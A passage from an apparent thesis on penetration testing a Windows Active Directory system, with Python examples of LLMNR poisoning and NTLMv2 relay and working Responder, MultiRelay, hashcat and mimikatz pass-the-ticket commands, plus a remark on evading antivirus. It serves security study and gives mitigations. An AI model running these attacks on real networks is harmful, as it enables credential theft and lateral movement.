Step 2. The AS receives the request and checks the ID against a user database, which is typically the AD. The long-term key derived from the password corresponding to the client's ID is used to encrypt a Ticket Granting Service (TGS) session key. The AS also prepares a TGT that contains the client's ID, network address, validity period and the TGS session key. The TGT is encrypted using the secret key of the TGS (in AD, the key of the krbtgt account), so the client cannot read or alter it. The two messages are sent in a response, AS-REP, to the client.

Step 3. The Kerberos client receives the two messages and decrypts the TGS session key. The client is unable to decrypt the TGT and sends it to the TGS together with a service ID to request a ticket for the desired service. To authenticate, the client sends an authenticator message containing the ID of the client and a timestamp. This message is encrypted using the TGS session key and is sent in a request, TGS-REQ, to the TGS.

Step 4. The TGS decrypts the TGT using its secret key to recover the TGS session key. The session key is used to decrypt the authenticator message, which validates the client. The TGS sends a TGS ticket that contains the client ID, network address, validity period and a client/service session key. This ticket is encrypted using the service's secret key. The TGS also sends the client/service session key encrypted using the TGS session key. The two messages are sent as a response, TGS-REP.

Step 5. The client now possesses an encrypted TGS ticket for the desired service. The client sends the TGS ticket and a new authenticator message encrypted with the client/service session key in a new request, AP-REQ to the service.

Step 6. The service responds with AP-REP if the data in the authenticator from the client is valid. The service sends a packet with the timestamp encrypted with the client/service session key, which proves to the client that the service knew the session key.

Kerberos is the default authentication method in Windows since Windows 2000, but in many cases NTLM is used as a fallback when a service does not implement Kerberos authentication, or when a service is addressed by IP address rather than by name [34]. For Kerberos to work, every service needs to be registered in the AD with a Service Principal Name. The KDC is installed on the DC and implements both the AS and the TGS, so that it can look up users in the AD database.


Chapter 4

Penetration Testing

Penetration testing is usually deemed to be the good side of hacking and is sometimes called ethical hacking, red teaming or just pen-testing, and is the technique used in this thesis. Penetration testing is a technique used to find and mitigate vulnerabilities in computer systems. It is usually done by external security experts and can be executed in many ways. White-box and black-box penetration testing are two examples: in the former the attacker is given all information, including source code, and in the latter no information at all. Penetration testing is done in multiple phases that are described in the following subsections [35].

Georgia Weidman [36] summarizes penetration testing in seven essential steps that are described next.

1. Pre-engagement Interactions

2. Intelligence Gathering

3. Threat Modeling

4. Vulnerability Analysis

5. Exploitation

6. Post Exploitation

7. Reporting


4.1 Pre-Engagement Interactions

It is important in every penetration testing job to set the scope of the testing and to have clear boundaries with the client. This is also when the client can provide all necessary credentials and IP addresses for the devices of interest that are to be tested. A clear scope of the assignment should be set, and the attacker must be informed which types of attacks are in scope. When attacking live systems, it is important that the system does not get flooded with unnecessary packets, to avoid unnecessary load on production systems [36].

4.2 Intelligence Gathering

This phase is for information gathering or reconnaissance about the system and helps to map the infrastructure. Reconnaissance is arguably the most important phase in penetration testing. It is important to understand the complete system on a high level to be able to see where vulnerabilities may lie. Looking at code that is old, or code that has been modified by many people, can lead to unexpected vulnerabilities that no one knows about. The client can in most cases help to get this step started. Communication with the client is important in most of the steps in penetration testing [35, 36].

The first step is usually to port scan the network with tools like Nmap [37] to identify all the hosts and all the ports that are open.

4.3 Threat Modeling

When the previous steps have been completed, it is time to do threat modeling.

By this time the attacker should have a good general knowledge of the system and can now focus attacks on the most critical parts of the system.

STRIDE is a threat modeling technique developed by Praerit Garg and Loren Kohnfelder in 1999 at Microsoft [38]. The method has been revised by Adam Shostack, who has written a book on threat modeling [39]; this section is heavily based on his work. The letters in STRIDE correspond to six threat categories that are described next. STRIDE is used to enumerate threats that could be leveraged by an attacker.


Spoofing

Spoofing is the first threat category and is a threat that violates authenticity.

There are multiple entities that can be spoofed, including people, services and computers. Strong authentication is the primary mitigation: deploying certificates, enforcing strong password policies and using protocols that authenticate both ends.

Tampering

Tampering is a threat against integrity and is the act of modifying something, e.g. changing files, memory or network traffic. The mitigation strategies for tampering are to use cryptographic protocols with integrity protection on the network and ACLs to prevent modification by non-authorized entities.

Repudiation

Repudiation is about denying the truth. An attacker will claim that nothing malicious was done, and the defender needs to be able to prove that something malicious happened. Good logging at many different levels of a computer system is therefore extremely important. It is also crucial that no one can tamper with or delete the logs.

Information Disclosure

Information disclosure is when information gets into the wrong hands, i.e. to a user who is not authorized to see it. There are many ways for information to be disclosed: sniffing network traffic, faulty permissions or verbose error messages. It is a threat to confidentiality and could damage a company's reputation.

Denial of Service

Denial of service attacks are a threat against availability. This could be done by using up all of the defender's resources. By sending many requests, a server can get overloaded and become unresponsive. This can be accomplished with a symmetric attack, where the attacker spends as many resources as the defender. A more sophisticated attacker could use an asymmetric attack that forces the defender to spend far more resources than the attacker does. Examples of this are a ZIP bomb or an NTP amplification attack [40].

Elevation of Privilege

Elevation of privilege is when a user escapes the set of restrictions or permissions that are set for that user. This is a threat against authorization and is one of the biggest threats in any system. A user could find a way to run privileged code arbitrarily, e.g. through XSS or SQL injection.

4.4 Vulnerability Analysis

When the hosts and threats have been enumerated, it is time to search for possible vulnerabilities. This is a phase that can be done manually by an experienced penetration tester or by using automated tools that scan against huge databases of known vulnerabilities [1, 36].

4.5 Exploitation

The exploitation phase is where the attacker tries to penetrate the security of the system by exploiting a vulnerability [36]. The holy grail is to gain root privileges on the targeted host machine, but a successful attack could also be crashing a server or exfiltrating documents or credentials that open up other attack vectors. Exploitation can be done with buffer overflows, weak authentication, SQL injections and many more. Exploitation frameworks like Metasploit [41] (see Section 5.1.2) exist that can easily exploit vulnerable systems.

4.6 Post Exploitation

As said in Section 4.5, the holy grail of penetration testing is to gain root privileges on a system, i.e. to have access to do anything. This can be done in many ways. Exploiting a process that runs as a more privileged user could give the attacker more privileges. Other ways are to find credentials to accounts that already have the required privileges or to use known vulnerabilities. Finding credentials is also one way to pivot or move laterally in the network, gaining access to other computers by reusing the existing credentials [36].

4.7 Reporting

The final stage of penetration testing is to report the findings to the client. This stage is commonly done by writing a report that should inform the client about the security situation and recommend what actions should be taken [35, 36].


Methods

This chapter describes and presents the method used in this thesis. A system to attack was provided by the company and is described in Section 5.1. Further on, the two main phases of the thesis, threat modeling and exploitation, are elaborated in Section 5.2 and Section 5.3.

5.1 Target System

A target system was provided for this thesis work. The system was virtualized in cloud infrastructure and was an identical representation of a real-world computer system that is used in production by the company. The system infrastructure is shown in Figure 5.1.

The system consisted of both Windows and Linux servers that were all connected to the same network. The system was also protected by various firewalls that secure it from outside attacks, but in the scope of this thesis the attacker was already connected to the network and performed all attacks from the inside. Such an attacker could have gained access by finding flaws in the firewall configuration or by leveraging zero-day exploits against the perimeter security devices.

All servers and computers were in the same domain, controlled by the Domain Controller (DC) on the network. The DC ran Microsoft's directory service Active Directory on Windows Server 2012 R2.

Figure 5.1: Target system infrastructure (three clients, three Windows servers, a domain controller, a Linux server and a database on the same network)

5.1.1 Hacking Machine

Most of the penetration testing was done from a Linux computer located inside the target system. The operating system used was Kali Linux 2019.1, which ships with a wide variety of tools. Additional tools were installed to further expand the toolset for finding vulnerabilities. Some of the tools will be briefly described.

5.1.2 Tools

Many tools were used when conducting the tests on the system. The tools that were the most impactful will be briefly presented next.

Nmap

Nmap [37, 42] is a tool to scan a network for live hosts, checking for open ports and identifying the versions of the software behind the ports. Nmap was used for reconnaissance to scan and enumerate hosts on the target network.

The output logs from Nmap were saved to be used later with other tools. Zenmap is the graphical interface for Nmap and can be used for a better overview.


Bloodhound

Bloodhound is a tool to scan and map an AD structure by querying three things on the network.

• Group membership of users and groups

• Administrators in the network

• User sessions. Who is logged in where?

This data can be collected on the network without administrative permissions.

By collecting this data, Bloodhound creates a graph and can calculate the shortest paths to escalate privileges in the network [43]. In Figure 5.2, the output from Bloodhound is shown as a graph where the vertices correspond to users, groups, computers and domains. The edges correspond to group membership, administrative rights, user sessions and domain trusts. The paths correspond to possible ways to move laterally in the network to reach the domain administrator. This enables penetration testers to choose where to focus to escalate privileges.

Figure 5.2: Bloodhound output


Metasploit

Metasploit [41] is an open-source vulnerability exploitation framework owned by Rapid7. There exist commercial versions of Metasploit, but Kali Linux ships with the free version that was used in this thesis. Metasploit has many modules that can be used for reconnaissance and to exploit known vulnerabilities.

Mimikatz

Mimikatz [44] is a tool written in C by Benjamin Delpy. The tool was created to extract and manipulate credentials in Windows systems by reading the memory of the Local Security Authority Subsystem Service (LSASS), which holds the credential material of logged-on users. LSASS runs as an executable under the path %SystemRoot%\System32\lsass.exe, and reading its memory requires local administrative privileges (SeDebugPrivil­ege) [45]. Mimikatz can be used to extract Kerberos tickets and other credentials.

Normally, running Mimikatz on a server is not desirable as anti-virus protection may detect it. It is, however, possible to run Mimikatz remotely using other tools like Metasploit or PowerShell Empire, without ever writing the binary to disk.

It is possible to compile Mimikatz from the source code, which makes it possible to alter it to change its signature. This can in most cases circumvent traditional signature-based anti-virus programs [46].

Responder

Responder [47] is an open source tool that can be used as a poisoner for many different protocols including LLMNR. It is used in Section 5.3.1, where LLMNR poisoning is described in more detail. Additional tools from a popular fork of Responder [48] are used, mainly RunFinger.py to fingerprint servers vulnerable to SMB relay attacks and MultiRelay.py to perform the attack.

Hashcat

Hashcat [18] is a password cracking suite that allows an attacker to use different password cracking methods to recover passwords from their hashes. A wide variety of hashes are supported [25] and different methods can be used, such as brute-force and dictionary attacks (see Section 2.3).

5.2 Threat Modeling Phase

The first phase of the thesis was threat modeling and included the first four penetration testing phases presented in Chapter 4.

The goal of the threat modeling phase was to gather as much information as possible to be able to create an accurate model of the system. It was also of interest to identify what the assets in the system were: what assets does the company want to protect, and what assets are the most interesting for an attacker?

5.2.1 Intelligence Gathering

To successfully create a good threat model, it was important to have a good understanding of how the system was designed and how it was used. The system was complex and hard to grasp, and for that reason the first step was to conduct a series of semi-structured interviews with employees who knew about the architecture, code and reasoning behind the system. The questions asked were:

1. What part of the system do you know about?

2. What can you tell about the architecture?

3. What part of the system do you think is the most vulnerable?

4. Is there any documentation?

Since the system was overwhelming, all guidance from developers to product owners was appreciated. Meetings were booked to get an overview of the system in the beginning and then getting more and more detailed about protocols and various system components.

Reconnaissance was also done alongside the interviews to map the system.

Port scans using Nmap, Bloodhound scanning, enumeration scripts and vulnerability scanners were used to get an overview of the system and to identify potential software that could be vulnerable.


5.2.2 Building the Model

To get a clear picture of the infrastructure and an idea of where to start, a threat model was generated in Microsoft Threat Modeling Tool [49]. The tool allows the user to model a system, including trust boundaries and data flows, and then generates a report of threats. The model created in Microsoft Threat Modeling Tool is presented in Figure 5.3.

Figure 5.3: Threat model of the system modeled in Threat Modeling Tool

5.2.3 Validating the Model

A first version of the model was presented to the security architect at the company. Comments were given on a few areas that were initially perceived wrongly; this was corrected in an iterative process.

A simpler tool used for validating the model was a card game called Elevation of Privilege [50] by Adam Shostack and Microsoft [39]. This game helped to find threats that correspond to the six threat categories in STRIDE [38]. The objective of the game is to build the threat model and to find new threats that no one has thought of before. Taking turns picking cards, the players need to figure out whether the threat presented on the card affects the system. A playing card from Elevation of Privilege is presented in Figure 5.4.


Figure 5.4: A playing card from the Elevation of Privilege game [39]

5.2.4 Threat Enumeration

After threat modeling the system, a wide variety of threats were found. To narrow the scope, the more specific area of authentication in the Windows domain was chosen. Possible threats to Windows Active Directory and its authentication methods were researched and tested. The results from testing the threats on the test system are presented in Chapter 7.

5.3 Exploitation Phase

The exploitation phase was primarily done from an attacker host running Kali Linux, as described in Section 5.1.1. Various tools were used to find vulnerabilities and to exploit them. This section presents three methods that were used and how they work. The results are presented in Chapter 7.


5.3.1 LLMNR Poisoning

Link-Local Multicast Name Resolution (LLMNR) is a Windows name resolution protocol that uses multicast (UDP port 5355 to the group 224.0.0.252). When the primary DNS server does not find an entry, the host multicasts a query on the local link to find the name.

The host carrying that name should in theory respond, but in practice an attacker can be the first to reply and pretend to be that host. The victim trusts the reply, connects to the attacker and authenticates with NTLMv2, which hands the attacker a challenge-response pair (commonly called the NTLMv2 hash) that can be cracked offline. The attack is presented in Figure 5.5 and can be summarized as follows:

1. The victim machine tries to connect to a file share on the network that does not exist, \\test

2. The victim queries the DNS server and gets the reply that the DNS server does not know the host

3. The victim multicasts a query on the network asking who \\test is

4. The attacker responds that it is \\test

5. The victim believes the reply and sends its username and NTLMv2 challenge-response to the attacker

6. The attacker cracks the response offline to recover the password

Figure 5.5: LLMNR poisoning. Victim to DNS server: 1. Connect to \\test; DNS server to victim: 2. Unknown server; victim to the link: 3. Who is \\test?; attacker to victim: 4. I am \\test; victim to attacker: 5. Here is my password hash.

For this attack, the tool Responder.py presented in Section 5.1.2 was used.
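To make the exchange in Figure 5.5 concrete, the following Python example is added here; it is not code from the thesis or from Responder. It builds the multicast query a Windows host sends for the single-label name test, parses it the way a poisoner would, and builds the spoofed answer that points the name at the attacker. The attacker address 192.168.109.50, the transaction ID and the 30-second TTL are constructed values for the example. The code only constructs and parses packets and never touches the network; a real poisoner binds UDP port 5355, joins 224.0.0.252 and unicasts the answer to the querying host, after which the victim connects to the attacker and authenticates with NTLM.

```python
import socket   # only inet_aton/inet_ntoa are used; nothing is sent on the network
import struct

# RFC 4795: LLMNR reuses the DNS message format over UDP 5355 to the group 224.0.0.252
LLMNR_GROUP = ("224.0.0.252", 5355)
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """Encode 'test' or 'fileserver.corp' as DNS labels: <len><label>...<0>."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(buf, off):
    """Decode labels at buf[off:], following one compression pointer if present."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                      # pointer into the message (RFC 1035 4.1.4)
            ptr = ((n & 0x3F) << 8) | buf[off]
            off += 1
            labels.append(decode_name(buf, ptr)[0])
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid, name):
    """What the victim multicasts after DNS has answered NXDOMAIN for the name (step 3)."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # QR=0, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt):
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not an LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query_pkt, attacker_ip, ttl=30):
    """The poisoner's answer (step 4): same ID, question echoed, one A record pointing at the attacker."""
    q = parse_query(query_pkt)
    if q["qtype"] != QTYPE_A:
        raise ValueError("only A queries are poisoned in this example")
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)  # QR=1, one answer
    question = query_pkt[12:]
    # name as a pointer to offset 12 (the question name), type A, class IN, TTL, 4-byte address
    answer = b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def parse_response(pkt):
    txid, flags, _qdcount, ancount = struct.unpack("!HHHH", pkt[:8])
    name, off = decode_name(pkt, 12)
    off += 4                                       # skip QTYPE and QCLASS of the echoed question
    answers = []
    for _ in range(ancount):
        rname, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        answers.append((rname, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000), "name": name, "answers": answers}


def poisoning_exchange(name="test", attacker_ip="192.168.109.50", txid=0x1234):
    """Steps 3-4 of the attack: the victim's (constructed) query and the attacker's spoofed reply, parsed."""
    query = build_query(txid, name)
    reply = build_poisoned_response(query, attacker_ip)
    return parse_query(query), parse_response(reply)


if __name__ == "__main__":
    q, r = poisoning_exchange()
    print("victim asked for", q["name"], "-> attacker answered", r["answers"])
```

The defensive counterpart is to make sure the query is never sent: the group policy setting "Turn off multicast name resolution" disables LLMNR on Windows hosts, and a host that does not multicast the query cannot be poisoned.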


5.3.2 SMB Relay

The SMB relay attack is a pass-the-hash style attack where the attacker gets access to a resource without knowing the password, or even the hash, of a user. This is arguably more serious than the LLMNR poisoning attack, where only challenge-responses were leaked that still had to be cracked.

For the SMB relay attack to work, the attacker must be able to obtain a valid NTLM authentication from a user and forward it to a vulnerable computer. This can be done in two ways.

First, the method presented in Section 5.3.1 provides the attacker with an authentication attempt to relay. Another method, not dependent on LLMNR poisoning, is acting as a Man-In-The-Middle. The attack is shown in Figure 5.6 and can be described as follows:

1. The victim computer wants to log in to a target server

2. The target responds with a challenge

3. The victim uses the challenge-response scheme described in Section 3.2.1 and sends back a response

4. The target authenticates the victim

5. The attacker acts as a MITM, forwards the previous messages in both directions and gains access to the target machine instead of the victim

For this attack the tool MultiRelay presented in Section 5.1.2 was used to relay the hash to a vulnerable server.
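The following Python example is added here to tie the NTLMv2 scheme from Section 3.2.1 to the relay in Figure 5.6; it is not code from the thesis, from Responder or from MultiRelay. It computes the NT-hash with a small pure-Python MD4 (hashlib frequently lacks MD4 on current OpenSSL builds), derives the NTLMv2 key and the NTv2 response as MS-NLMP specifies them, and then plays the exchange against a simulated target server: the attacker forwards the target's challenge to the victim and the victim's response back to the target without ever holding the NT-hash. The account alice/CORP, its password, the challenges and the target's AV-pair list are constructed for the example, and the signing check is a simplified stand-in for SMB signing (real SMB2 signs every message with HMAC-SHA256 or AES-CMAC under a key derived from the session key); it is kept only to show why the relay fails once signing is required.

```python
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF


def md4(data):
    """MD4 as in RFC 1320, in pure Python (hashlib often lacks md4 on OpenSSL 3 builds)."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                                       # round 1
            a = rot((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                                       # round 2
            a = rot((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                                       # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rot((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT-hash = MD4(UTF-16LE(password)); case sensitive, no 14-character limit."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt, user, domain):
    """NTLMv2 key: HMAC-MD5 keyed with the NT-hash over the upper-cased user name and the domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """NTv2 response = HMAC-MD5(key, SC | blob) | blob; the blob carries time, CC and the AV pairs."""
    key = ntowf_v2(nt, user, domain)
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()      # what signing is keyed from
    return nt_proof + blob, session_base_key


class TargetServer:
    """The exposed server; its account table stands in for the DC it would normally ask."""

    def __init__(self, accounts, require_signing):
        self.accounts = accounts                  # {(user, domain): nt_hash}
        self.require_signing = require_signing
        # AV pairs from the CHALLENGE message: MsvAvNbDomainName "CORP" followed by MsvAvEOL
        self.target_info = b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le") + b"\x00\x00\x00\x00"

    def challenge(self):
        return os.urandom(8)

    def authenticate(self, user, domain, server_challenge, response, first_message_mac=None):
        nt = self.accounts.get((user, domain))
        if nt is None:
            return False
        key = ntowf_v2(nt, user, domain)
        nt_proof, blob = response[:16], response[16:]
        if not hmac.compare_digest(nt_proof, hmac.new(key, server_challenge + blob, hashlib.md5).digest()):
            return False
        if self.require_signing:
            # simplified signing: the first SMB message must carry a MAC under the session base key,
            # which only a party holding the NT-hash can derive (a relay cannot)
            session_key = hmac.new(key, nt_proof, hashlib.md5).digest()
            expected = hmac.new(session_key, b"SMB2 TREE_CONNECT", hashlib.sha256).digest()
            return first_message_mac is not None and hmac.compare_digest(first_message_mac, expected)
        return True


def relay(require_signing):
    """Figure 5.6 end to end; True if the attacker ends up with a session on the target."""
    victim_nt = nt_hash("Summer2019!")                           # victim's password (constructed)
    target = TargetServer({("alice", "CORP"): victim_nt}, require_signing)
    sc = target.challenge()                                      # 1b/2b: attacker -> target
    cc = os.urandom(8)                                           # chosen by the victim
    response, _ = ntlmv2_response(victim_nt, "alice", "CORP", sc, cc, 0, target.target_info)  # 2a/3a
    # 3b: the attacker relays the victim's response unchanged; it never held victim_nt
    return target.authenticate("alice", "CORP", sc, response, first_message_mac=None)
```

relay(False) returns True: the target cannot tell that the response was computed by the victim rather than by the party that opened the connection. relay(True) returns False because the attacker can forward the response but not the session base key that signing needs, which is exactly why requiring SMB signing is the standard mitigation.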

5.3.3 Kerberos Pass the Ticket

Kerberos is the successor to the challenge-response schemes and is the default authentication method in Microsoft AD. Kerberos is a ticket-based SSO authentication method and never sends password hashes over the wire. In contrast to the SMB relay attack previously described, Kerberos is vulnerable to other types of attacks.

One attack that will be presented is a pass-the-ticket attack that allows an attacker to move laterally in the system by extracting Kerberos tickets belonging to other accounts. The attack works by extracting the TGT from the LSASS memory of a compromised computer. It only works if the attacker already has local administrative privileges on the computer and another user logs on to it. This can be done with tools like Mimikatz (see Section 5.1.2), Kekeo or Rubeus. Rubeus can even monitor the Windows logon event 4624 and notify the attacker when a new user has logged in to the computer [51].

Figure 5.6: SMB relay attack. The victim connects to the attacker (1a), who opens its own connection to the target server (1b); the target's challenge (2b) is handed to the victim as the attacker's challenge (2a); the victim's response (3a) is forwarded to the target (3b); the target grants the attacker's session while the victim is told that access was denied (4a/4b).

The TGT can now be passed to another host to access resources as the victim.

Tickets have a relatively short life span compared to passwords. Tickets are usually valid for 10 hours, but in the case of this system the life span was much longer, as will be presented in Section 7.4.

5.4 Reporting

All found vulnerabilities were reported to the company using responsible disclosure as presented in Section 2.4.1. The company was given enough time to resolve the found vulnerabilities before they were published in this thesis. The reported vulnerabilities are anonymized to protect the company and its product.

A presentation was given to the company where the findings were presented to interested coworkers.


Threat Modeling Results

During the threat modeling phase, the security of the system was assessed as a whole. A data-flow diagram as shown in Figure 5.3 was created for the system and for the separate servers. Along with the diagrams, a STRIDE analysis was conducted to enumerate threats in the system. Some of the threats are shown in Table 6.1; the focus area of authentication was chosen after these findings.

Table 6.1: Vulnerability enumeration of the system using STRIDE

Type                    Threats
Spoofing                - Spoof a server
                        - Spoof a user by using its Kerberos keys
Tampering               - Alter packets in transit between servers
Repudiation             - Wipe local logs
                        - No backup/centralized logging server
                        - Possibility to remove logs for the login application
Information Disclosure  - MITM attack between two servers leaks information about the communication
                        - Leakage of system settings
                        - Leakage of encryption keys or passwords
Denial of Service       - Crash any of the services
                        - AD becomes unavailable and no one can be authenticated
Elevation of Privilege  - Pass-the-hash possibilities
                        - Sniffing hashes and cracking them for credentials
                        - Users with too many privileges


Exploitation Results

This chapter presents the findings from the exploitation phase of the penetration test conducted on the system. Section 7.1 presents findings about the domain administrator account. Next, the results of the three types of attacks presented in Section 5.3 follow. Section 7.2 presents an LLMNR poisoning attack, Section 7.3 an SMB relay attack and lastly Section 7.4 a Kerberos pass-the-ticket attack.

7.1 Domain Administrator

The domain administrator account was configured in a way that allowed the user to log in to every machine on the network. From an administrative point of view, this seems like a convenient way to administer workstations and servers in the domain, but it could lead to privilege escalation.

An attacker could already have compromised a computer and a user that has local administrative rights. If the domain administrator decides to remotely connect to this workstation, the attacker can exfiltrate tickets for the domain administrator account from memory.

This method does not only work for the domain administrator, but for any user that has more privileges than the attacker. By gradually gaining more privilege (following the graph from Bloodhound in Figure 5.2), the attacker can get closer to its target.


7.2 LLMNR Poisoning

Link-Local Multicast Name Resolution (LLMNR) poisoning was possible on the target system and was used to capture the NTLMv2 challenge-response (labelled NTLMv2-SSP by Responder) of a user. This was done by using Responder with the command presented in Listing 7.1.

$ python Responder.py -I eth0

Listing 7.1: LLMNR poisoning using Responder

This started an LLMNR poisoner that waits for LLMNR requests on the network. When a user on the network tries to access a network resource that does not exist, the host multicasts an LLMNR query that Responder answers, and the host then authenticates to Responder with NTLM, handing over a challenge-response pair. If the password is weak, the pair can be cracked offline with common tools such as Hashcat.

Figure 7.1: Output from LLMNR poisoning using Responder

Password Cracking

The gathered hashes were cracked using the password cracking software Hashcat. As described in Section 2.3, a wide variety of methods can be used, such as brute-force, dictionary or rainbow table attacks (rainbow tables do not apply to NTLMv2 responses, since each one is salted by the server and client challenges). A dictionary attack using Hashcat was performed with the command in Listing 7.2, where mode 5600 selects NetNTLMv2.

$ hashcat -m 5600 llmnr-hash.txt ~/dictionary.txt

Listing 7.2: Hashcat NTLM cracking

The hash of the user was cracked using this method, but cracking hashes can be time-consuming and not a reliable way to gain access. Another attack called SMB relay is presented in the next section where cracking the hash is not necessary.

7.3 SMB Relay

It was discovered that one server in the system had SMBv1 enabled with SMB signing turned off. These conditions enable an attacker to use the pass-the-hash style attack called SMB relaying; the decisive condition is that signing is not required. With a script called RunFinger.py [48] (Listing 7.3), vulnerable hosts were identified, as shown in Figure 7.2. Here we see that the machine with IP 192.168.109.23 is exposed to this attack.

Figure 7.2: Output from RunFinger.py

$ python RunFinger.py -i 192.168.109.0/24

Listing 7.3: Identifying SMB relay targets

$ python Responder.py -I eth0
$ python MultiRelay.py -t 192.168.109.23 -u ALL

Listing 7.4: SMB Relay

This attack required two steps. First, Responder was started as in Section 7.2. Next, MultiRelay.py [48] was started targeting the exposed server, relaying the authentication of any user to it (Listing 7.4). A user who tries to connect to a server that does not exist is poisoned and authenticates to the attacker, who forwards the NTLM challenge obtained from the exposed server to the user and the user's response back to the server. Because SMB signing is not required, the server accepts a session whose NTLM authentication was actually performed by the victim; with signing enforced, every following SMB message would have to be signed with a session key derived from the victim's NT-hash, which the attacker never obtains.

The attacker now has a remote shell on the exposed server. In this case, the hash never has to be cracked.

7.4 Kerberos

In the Active Directory configuration, weak Kerberos policy settings were found, as shown in Table 7.1. The values in question were:

• Maximum lifetime for service ticket

• Maximum lifetime for user ticket

• Maximum lifetime for user ticket renewal

These values were set to 86400 minutes (60 days), 1440 hours (60 days) and 9125 days (25 years) respectively. The recommended (default) values from Microsoft are 600 minutes (10 hours), 10 hours and 7 days [52]. This is quite serious, as an attacker who gets hold of a ticket can keep using it for a very long time.

If the scenario described in Section 7.1 occurs, an attacker could use tools such as Mimikatz to exfiltrate the credentials or Kerberos tickets of a more privileged user when that user opens a session on a compromised computer. Using Mimikatz (see Section 5.1.2), the attacker can get the Kerberos tickets from the LSASS memory. With the tickets, the attacker can perform a pass-the-ticket attack and forward the tickets. Because the tickets are leased for such a long time, the attacker retains access to resources for a long time; with the default 10-hour lifetime, a stolen TGT would have to be renewed or re-stolen within the working day.

Table 7.1: Vulnerable Kerberos configuration

Policy                                    Value           Recommended value
Maximum lifetime for service ticket       86400 minutes   600 minutes
Maximum lifetime for user ticket          1440 hours      10 hours
Maximum lifetime for user ticket renewal  9125 days       7 days

On the system it was possible to exfiltrate the domain administrator tickets in the case that the user logged in on a compromised computer. Mimikatz was used with the commands in Listing 7.5.

mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt <ticket>

Listing 7.5: Kerberos pass-the-ticket using mimikatz
